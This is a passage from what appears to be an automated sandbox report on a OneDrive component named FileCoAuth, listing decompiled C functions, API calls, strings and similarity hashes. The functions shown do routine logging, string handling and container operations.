    			}

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E9CDCC
    • _Mtx_lock.MSVCP120(?), ref: 00E9CDF5
      • Part of subcall function 00E9E349: ?_Throw_C_error@std@@YAXH@Z.MSVCP120(00000000,?,00E9BECC,00000000,00000004,00E9BE52), ref: 00E9E357
      • Part of subcall function 00EA1237: __EH_prolog3_GS.LIBCMT ref: 00EA123E
    • _Mtx_unlock.MSVCP120(?), ref: 00E9CEB1
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: H_prolog3_$C_error@std@@Mtx_lockMtx_unlockThrow_
    • String ID: Personal
    • API String ID: 662603466-150736850
    • Opcode ID: 5cf82028d428d0c1931b96cca90c52299daebb62797135b561d479f9ec17a3fc
    • Instruction ID: 45d89c38deda768cb87754aeab0ad1aff7ddffd28c846807a4fc8452c8c9b691
    • Opcode Fuzzy Hash: 5cf82028d428d0c1931b96cca90c52299daebb62797135b561d479f9ec17a3fc
    • Instruction Fuzzy Hash: 2D219C709012189BCF11EB24C886BECB7B4AF5B318F2410C8E045BB2C2DB746F49CB51
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 16%
    			E00E93B35(intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16) {
    				signed int _v8;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				signed int _v40;
    				intOrPtr* _v48;
    				char* _v52;
    				intOrPtr _v56;
    				signed int _v64;
    				intOrPtr* _v72;
    				intOrPtr _v76;
    				char _v80;
    				void* __edi;
    				void* __esi;
    				signed int _t20;
    				intOrPtr _t25;
    				intOrPtr _t26;
    				void* _t27;
    				intOrPtr* _t28;
    				signed int _t29;
    				intOrPtr* _t30;
    				signed int _t31;
    				intOrPtr _t32;
    				void* _t40;
    				signed int _t41;
    
    				_t20 =  *0xeb0090; // 0xbb40e64e
    				_v8 = _t20 ^ _t41;
    				_t28 = _a8;
    				_v76 = 0xea76b8;
    				_v72 = _t28;
    				_v80 = 1;
    				if(_t28 == 0) {
    					_t29 = 0;
    				} else {
    					_t40 = _t28 + 2;
    					do {
    						_t26 =  *_t28;
    						_t28 = _t28 + 2;
    					} while (_t26 != 0);
    					_t29 = _t28 - _t40 >> 1;
    				}
    				_v64 = _t29;
    				_t30 = _a12;
    				_v52 = "instance";
    				_v56 = 1;
    				_v48 = _t30;
    				if(_t30 == 0) {
    					_t31 = 0;
    				} else {
    					_t40 = _t30 + 2;
    					do {
    						_t25 =  *_t30;
    						_t30 = _t30 + 2;
    					} while (_t25 != 0);
    					_t31 = _t30 - _t40 >> 1;
    				}
    				_v40 = _t31;
    				_t32 = 3;
    				_v24 = _a16;
    				_v28 = "hr";
    				_v32 = _t32;
    				__imp__?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z(0x1b, "SyncEngineFileInfoProvider::GetPropertyHandlerFromPath", 0xea7810, 0x38728f57, 1, _t32,  &_v80);
    				__imp__?LoggingRotateIfNeeded@@YGXXZ();
    				return E00EA29F2(_t27, _v8 ^ _t41, 0, 1, _t40, "d:\\dbs\\sh\\odib\\0313_155253\\cmd\\24\\client\\onedrive\\product\\filecoauth\\filecoauth\\syncenginefileinfoprovider.cpp");
    			}

    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp,0000001B,SyncEngineFileInfoProvider::GetPropertyHandlerFromPath,00EA7810,38728F57,00000001,00000003,?), ref: 00E93BD7
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E93BDD
    Strings
    • SyncEngineFileInfoProvider::GetPropertyHandlerFromPath, xrefs: 00E93BC1
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp, xrefs: 00E93BC8
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: SyncEngineFileInfoProvider::GetPropertyHandlerFromPath$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp
    • API String ID: 2559330748-2046853744
    • Opcode ID: b84787c4103dcf261fe1923aab64393cb7d57a0db1bfe71e56674de189893020
    • Instruction ID: c30b7f7e9170c8db530fa16b02bb322849edfcbf6f1e3b6b418612aa4913386d
    • Opcode Fuzzy Hash: b84787c4103dcf261fe1923aab64393cb7d57a0db1bfe71e56674de189893020
    • Instruction Fuzzy Hash: 0C21CF70E042099BCF18CF6ACC16ABEBBB0EF89300F14451EE846BB240D7316E028B54
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 37%
    			E00E95904(intOrPtr* __ecx, signed int _a4, signed int _a8, intOrPtr _a12) {
    				void* __ebx;
    				void* __edi;
    				intOrPtr _t21;
    				signed int _t22;
    				intOrPtr* _t33;
    				void* _t35;
    				signed int _t37;
    				signed int _t38;
    				intOrPtr* _t40;
    				signed int _t42;
    				intOrPtr* _t44;
    				intOrPtr* _t45;
    
    				_t44 = _a4;
    				_t45 = __ecx;
    				_t37 = _a8;
    				_t21 =  *((intOrPtr*)(_t44 + 0x10));
    				if(_t21 < _t37) {
    					__imp__?_Xout_of_range@std@@YAXPBD@Z("invalid string position");
    				}
    				_t22 = _t21 - _t37;
    				_t38 =  *(_t45 + 0x10);
    				_a4 = _t38;
    				_t35 =  <  ? _t22 : _a12;
    				if((_t22 | 0xffffffff) - _t38 <= _t35) {
    					__imp__?_Xlength_error@std@@YAXPBD@Z("string too long");
    				}
    				if(_t35 != 0 && E00E94D8F(_t35, _t45, _t44, _t38 + _t35, 0) != 0) {
    					if( *((intOrPtr*)(_t44 + 0x14)) >= 8) {
    						_t44 =  *_t44;
    					}
    					if( *((intOrPtr*)(_t45 + 0x14)) < 8) {
    						_t40 = _t45;
    					} else {
    						_t40 =  *_t45;
    					}
    					E00E942E3(_t40 +  *(_t45 + 0x10) * 2, _t44 + _a8 * 2, _t35);
    					_t42 = _a4 + _t35;
    					 *(_t45 + 0x10) = _t42;
    					if( *((intOrPtr*)(_t45 + 0x14)) < 8) {
    						_t33 = _t45;
    					} else {
    						_t33 =  *_t45;
    					}
    					 *((short*)(_t33 + _t42 * 2)) = 0;
    				}
    				return _t45;
    			}

    APIs
    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,00000000,00000000,?,?,00E99934,?,00000000,000000FF,00000000,?,?,00E912F1,?,00000000,00000000), ref: 00E95920
    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,00000000,00000000,?,?,00E99934,?,00000000,000000FF,00000000,?,?,00E912F1,?,00000000,00000000), ref: 00E95944
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Xlength_error@std@@Xout_of_range@std@@
    • String ID: invalid string position$string too long
    • API String ID: 737550999-4289949731
    • Opcode ID: 960cec4d413274743886a69329600a0474734469ad8556190c87b4087d360f69
    • Instruction ID: 6cb13121c40270e2ad636d27a3a9e6a097ba34614604c5dde766fa80e133a63c
    • Opcode Fuzzy Hash: 960cec4d413274743886a69329600a0474734469ad8556190c87b4087d360f69
    • Instruction Fuzzy Hash: C421C072300604EFDB24CF6CCC8496AB7A9FF85765710192EE455E7290C730E959CBA0
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 16%
    			E00E991E6(intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16) {
    				signed int _v8;
    				signed int _v16;
    				intOrPtr* _v24;
    				char* _v28;
    				intOrPtr _v32;
    				intOrPtr _v48;
    				char* _v52;
    				intOrPtr _v56;
    				signed int _v64;
    				intOrPtr* _v72;
    				char* _v76;
    				char _v80;
    				void* __edi;
    				void* __esi;
    				signed int _t20;
    				intOrPtr _t25;
    				intOrPtr _t26;
    				void* _t27;
    				intOrPtr* _t28;
    				signed int _t29;
    				intOrPtr* _t30;
    				signed int _t31;
    				void* _t39;
    				signed int _t40;
    
    				_t20 =  *0xeb0090; // 0xbb40e64e
    				_v8 = _t20 ^ _t40;
    				_t28 = _a8;
    				_v76 = "file";
    				_v72 = _t28;
    				_v80 = 1;
    				if(_t28 == 0) {
    					_t29 = 0;
    				} else {
    					_t39 = _t28 + 2;
    					do {
    						_t26 =  *_t28;
    						_t28 = _t28 + 2;
    					} while (_t26 != 0);
    					_t29 = _t28 - _t39 >> 1;
    				}
    				_v64 = _t29;
    				_t30 = _a16;
    				_v52 = "line";
    				_v56 = 3;
    				_v48 = _a12;
    				_v28 = "message";
    				_v32 = 1;
    				_v24 = _t30;
    				if(_t30 == 0) {
    					_t31 = 0;
    				} else {
    					_t39 = _t30 + 2;
    					do {
    						_t25 =  *_t30;
    						_t30 = _t30 + 2;
    					} while (_t25 != 0);
    					_t31 = _t30 - _t39 >> 1;
    				}
    				_v16 = _t31;
    				__imp__?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z(0x1b, "FailFastTrace", 0xea7d10, 0xcc2f8c83, 1, 3,  &_v80);
    				__imp__?LoggingRotateIfNeeded@@YGXXZ();
    				return E00EA29F2(_t27, _v8 ^ _t40, 0, 1, _t39, "d:\\dbs\\sh\\odib\\0313_155253\\cmd\\17\\client\\onedrive\\product\\ux\\shared\\failfast.cpp");
    			}

    0x00e991ee 0x00e991f5 0x00e991f8 0x00e99201 0x00e99209 0x00e9920c 0x00e99211 0x00e99227 0x00e99213 0x00e99213 0x00e99216 0x00e99216 0x00e99219 0x00e9921c 0x00e99223 0x00e99223 0x00e9922c 0x00e9922f 0x00e99232 0x00e99239 0x00e99240 0x00e99243 0x00e9924a 0x00e9924d 0x00e99252 0x00e99268 0x00e99254 0x00e99254 0x00e99257 0x00e99257 0x00e9925a 0x00e9925d 0x00e99264 0x00e99264 0x00e9926d 0x00e9928a 0x00e99290 0x00e992a5

    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\failfast.cpp,0000001B,FailFastTrace,00EA7D10,CC2F8C83,00000001,00000003,?,00000000), ref: 00E9928A
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E99290
    Strings
    • FailFastTrace, xrefs: 00E9927E
    • d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\failfast.cpp, xrefs: 00E99285
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: FailFastTrace$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\failfast.cpp
    • API String ID: 2559330748-1142512593
    • Opcode ID: a049d0e73a6193a9a00f5570b0f53edc2c0781567dc976a66c48328c109ca248
    • Instruction ID: 184b4423402d113e7086b82267eb27220258d0fab3841273af93c5aa1bef04ea
    • Opcode Fuzzy Hash: a049d0e73a6193a9a00f5570b0f53edc2c0781567dc976a66c48328c109ca248
    • Instruction Fuzzy Hash: 08219274D01209ABCF18DF5AE9555AEBBB4EF89704F54501EE8067B351CB706A028B40
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 74%
    			E00EA1488(intOrPtr* _a4, char _a8, intOrPtr* _a12, intOrPtr _a16) {
    				intOrPtr _v20;
    				void* __esi;
    				intOrPtr* _t47;
    				intOrPtr* _t48;
    				intOrPtr _t49;
    				intOrPtr* _t50;
    				intOrPtr* _t68;
    				intOrPtr* _t72;
    				intOrPtr _t76;
    				intOrPtr _t77;
    				intOrPtr _t78;
    				intOrPtr* _t83;
    				intOrPtr* _t84;
    				void* _t88;
    				intOrPtr* _t89;
    
    				_push(_v20);
    				L00EA29EC();
    				_push(0);
    				_push(0);
    				L00EA3138();
    				asm("int3");
    				_push(_t88);
    				_t95 =  *0x00000004 - 0x6666665;
    				if( *0x00000004 >= 0x6666665) {
    					__imp__?_Xlength_error@std@@YAXPBD@Z("map/set<T> too long");
    				}
    				_push(_a16);
    				_t47 = E00EA144C(0, _t88, _t95);
    				 *((intOrPtr*)(4)) =  *((intOrPtr*)(4)) + 1;
    				_t72 = _t47;
    				_t48 = _a12;
    				 *((intOrPtr*)(_t72 + 4)) = _t48;
    				_t76 =  *0x00000000;
    				if(_t48 != _t76) {
    					__eflags = _a8;
    					if(_a8 == 0) {
    						 *((intOrPtr*)(_t48 + 8)) = _t72;
    						_t77 =  *0x00000000;
    						__eflags = _t48 -  *((intOrPtr*)(_t77 + 8));
    						if(_t48 ==  *((intOrPtr*)(_t77 + 8))) {
    							 *((intOrPtr*)(_t77 + 8)) = _t72;
    						}
    					} else {
    						 *_t48 = _t72;
    						_t83 =  *0x00000000;
    						__eflags = _t48 -  *_t83;
    						if(_t48 ==  *_t83) {
    							 *_t83 = _t72;
    						}
    					}
    				} else {
    					 *((intOrPtr*)(_t76 + 4)) = _t72;
    					 *((intOrPtr*)( *0x00000000)) = _t72;
    					 *((intOrPtr*)( *0x00000000 + 8)) = _t72;
    				}
    				_t49 =  *((intOrPtr*)(_t72 + 4));
    				_t89 = _t72;
    				while( *((char*)(_t49 + 0xc)) == 0) {
    					_t50 =  *((intOrPtr*)(_t89 + 4));
    					_t84 =  *((intOrPtr*)(_t50 + 4));
    					_t78 =  *_t84;
    					__eflags = _t50 - _t78;
    					if(_t50 != _t78) {
    						__eflags =  *((char*)(_t78 + 0xc));
    						if( *((char*)(_t78 + 0xc)) != 0) {
    							__eflags = _t89 -  *_t50;
    							if(_t89 ==  *_t50) {
    								_t89 = _t50;
    								E00E95088(0, _t89);
    							}
    							 *((char*)( *((intOrPtr*)(_t89 + 4)) + 0xc)) = 1;
    							 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t89 + 4)) + 4)) + 0xc)) = 0;
    							E00E95042(0,  *((intOrPtr*)( *((intOrPtr*)(_t89 + 4)) + 4)));
    							L21:
    							_t49 =  *((intOrPtr*)(_t89 + 4));
    							continue;
    						}
    						L17:
    						 *((char*)(_t50 + 0xc)) = 1;
    						 *((char*)(_t78 + 0xc)) = 1;
    						 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t89 + 4)) + 4)) + 0xc)) = 0;
    						_t89 =  *((intOrPtr*)( *((intOrPtr*)(_t89 + 4)) + 4));
    						goto L21;
    					}
    					_t78 =  *((intOrPtr*)(_t84 + 8));
    					__eflags =  *((char*)(_t78 + 0xc));
    					if( *((char*)(_t78 + 0xc)) == 0) {
    						goto L17;
    					}
    					__eflags = _t89 -  *((intOrPtr*)(_t50 + 8));
    					if(_t89 ==  *((intOrPtr*)(_t50 + 8))) {
    						_t89 = _t50;
    						E00E95042(0, _t89);
    					}
    					 *((char*)( *((intOrPtr*)(_t89 + 4)) + 0xc)) = 1;
    					 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t89 + 4)) + 4)) + 0xc)) = 0;
    					E00E95088(0,  *((intOrPtr*)( *((intOrPtr*)(_t89 + 4)) + 4)));
    					goto L21;
    				}
    				 *((char*)( *((intOrPtr*)( *0x00000000 + 4)) + 0xc)) = 1;
    				_t68 = _a4;
    				 *_t68 = _t72;
    				return _t68;
    			}

    0x00ea1488 0x00ea148b 0x00ea1493 0x00ea1494 0x00ea1495 0x00ea149a 0x00ea14a1 0x00ea14a5 0x00ea14ac 0x00ea14b3 0x00ea14b3 0x00ea14b9 0x00ea14bc 0x00ea14c1 0x00ea14c4 0x00ea14c6 0x00ea14c9 0x00ea14cc 0x00ea14d0 0x00ea14e0 0x00ea14e4 0x00ea14f2 0x00ea14f5 0x00ea14f7 0x00ea14fa 0x00ea14fc 0x00ea14fc 0x00ea14e6 0x00ea14e6 0x00ea14e8 0x00ea14ea 0x00ea14ec 0x00ea14ee 0x00ea14ee 0x00ea14ec 0x00ea14d2 0x00ea14d2 0x00ea14d7 0x00ea14db 0x00ea14db 0x00ea14ff 0x00ea1502 0x00ea159c 0x00ea1509 0x00ea150c 0x00ea150f 0x00ea1511 0x00ea1513 0x00ea154d 0x00ea1551 0x00ea156d 0x00ea156f 0x00ea1571 0x00ea1576 0x00ea1576 0x00ea1580 0x00ea158a 0x00ea1594 0x00ea1599 0x00ea1599 0x00000000 0x00ea1599 0x00ea1553 0x00ea1553 0x00ea1557 0x00ea1561 0x00ea1568 0x00000000 0x00ea1568 0x00ea1515 0x00ea1518 0x00ea151c 0x00000000 0x00000000 0x00ea151e 0x00ea1521 0x00ea1523 0x00ea1528 0x00ea1528 0x00ea1532 0x00ea153c 0x00ea1546 0x00000000 0x00ea1546 0x00ea15ad 0x00ea15b1 0x00ea15b4 0x00ea15b8

    APIs
    • ??3@YAXPAX@Z.MSVCR120 ref: 00EA148B
    • _CxxThrowException.MSVCR120(00000000,00000000), ref: 00EA1495
    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(map/set<T> too long), ref: 00EA14B3
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ??3@ExceptionThrowXlength_error@std@@
    • String ID: map/set<T> too long
    • API String ID: 2603369972-1285458680
    • Opcode ID: a6870c621c2f2552908cf7250b3a0e35688a818d6989c42391d18c9bf42c5d6c
    • Instruction ID: 590eae2b107c7b1223e92e1d2b9b7cbac607043abd610aedc24a4e84e4a4c94f
    • Opcode Fuzzy Hash: a6870c621c2f2552908cf7250b3a0e35688a818d6989c42391d18c9bf42c5d6c
    • Instruction Fuzzy Hash: D6016975204201AFC704DF19D889956BBE5FB4E354B29D0AAF919AF322C771EC10CB61
    Uniqueness

    Uniqueness Score: -1,00%

    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp,00000014,StorageProviderFinder::GetAccountInstanceByPath,00EA7810,B6386A17,00000001,00000002,00000001), ref: 00E943C9
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E943CF
    Strings
    • StorageProviderFinder::GetAccountInstanceByPath, xrefs: 00E943AC
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp, xrefs: 00E943B3
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: StorageProviderFinder::GetAccountInstanceByPath$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp
    • API String ID: 2559330748-1576029408
    • Opcode ID: 6da8f4922592bf951a8544e458276d298b4890a72a77d765a1f3dfcf9f9377d8
    • Instruction ID: 7ff90248ef545cf6c1c02fd62c04169b85ca64510d37cd09428708cb4a4fe49a
    • Opcode Fuzzy Hash: 6da8f4922592bf951a8544e458276d298b4890a72a77d765a1f3dfcf9f9377d8
    • Instruction Fuzzy Hash: DA01C4B0A45209AFCB08DF69DC06BEEBBB4EB9E704F50912DE9467B280C6716905CB54
    Uniqueness

    Uniqueness Score: -1,00%

    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp,00000096,StorageProviderFinder::GetStorageProviderFromRot,00EA7810,F59FF406,00000001,00000002,00000001), ref: 00E94504
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E9450A
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp, xrefs: 00E944EE
    • StorageProviderFinder::GetStorageProviderFromRot, xrefs: 00E944E4
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: StorageProviderFinder::GetStorageProviderFromRot$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp
    • API String ID: 2559330748-509154929
    • Opcode ID: 48c93ddc4d82db42dbd0685d8f2423ce2780d4c5c9680ecd80886c3049ac2f67
    • Instruction ID: 9e0bf856951088256154f104153f5724b34af578ff2ea5936bb9130024f75699
    • Opcode Fuzzy Hash: 48c93ddc4d82db42dbd0685d8f2423ce2780d4c5c9680ecd80886c3049ac2f67
    • Instruction Fuzzy Hash: 1801C470A45309ABDB18DF69DC46FAFBBB0EB9D700F50511DE816BA280C6716906CB44
    Uniqueness

    Uniqueness Score: -1,00%

    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp,00000026,SyncEngineFileInfoProvider::GetPropertyHandlerFromPath,00EA7810,00C5D339,00000001,00000002,00000001), ref: 00E93C6E
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E93C74
    Strings
    • SyncEngineFileInfoProvider::GetPropertyHandlerFromPath, xrefs: 00E93C51
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp, xrefs: 00E93C58
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: SyncEngineFileInfoProvider::GetPropertyHandlerFromPath$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp
    • API String ID: 2559330748-2046853744
    • Opcode ID: 92c770012fdfc7ec20c3e3ff7259e99a231d3a164f48808f0b33ac59d37b5452
    • Instruction ID: 4f49cc8ebdb076e90eb508ebfcf4237112324b4663d9152db68c1274af38fd24
    • Opcode Fuzzy Hash: 92c770012fdfc7ec20c3e3ff7259e99a231d3a164f48808f0b33ac59d37b5452
    • Instruction Fuzzy Hash: 0801AD74A41209ABCB14DF68DC06BAEFBB0EB9E700F50412DEC06BB280C6B16A058B54
    Uniqueness

    Uniqueness Score: -1,00%

    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp,00000044,SyncEngineFileInfoProvider::GetPropertyHandlerFromUri,00EA7810,C5EF5D3B,00000001,00000002,00000001), ref: 00E93D03
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E93D09
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp, xrefs: 00E93CED
    • SyncEngineFileInfoProvider::GetPropertyHandlerFromUri, xrefs: 00E93CE6
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: SyncEngineFileInfoProvider::GetPropertyHandlerFromUri$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp
    • API String ID: 2559330748-3724481269
    • Opcode ID: e58b825e6f1f9d4015e6b5337309aef9f00999a7295a4b0c23411d8bcc2bfb41
    • Instruction ID: 3369b62c450b541f537e57ed50e93eb7321b3c89b27e23633ee4967bb0bcb0df
    • Opcode Fuzzy Hash: e58b825e6f1f9d4015e6b5337309aef9f00999a7295a4b0c23411d8bcc2bfb41
    • Instruction Fuzzy Hash: CA010074A01209ABCB04DF68CC46BAFBBB0EF9E300F50451EF806BB281C6B16A05CB54
    Uniqueness

    Uniqueness Score: -1,00%

    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp,00000049,SyncEngineFileInfoProvider::GetPropertyHandlerFromUri,00EA7810,5693976C,00000001,00000002,00000001), ref: 00E93E5B
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E93E61
    Strings
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\syncenginefileinfoprovider.cpp, xrefs: 00E93E45
    • SyncEngineFileInfoProvider::GetPropertyHandlerFromUri, xrefs: 00E93E3E
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp
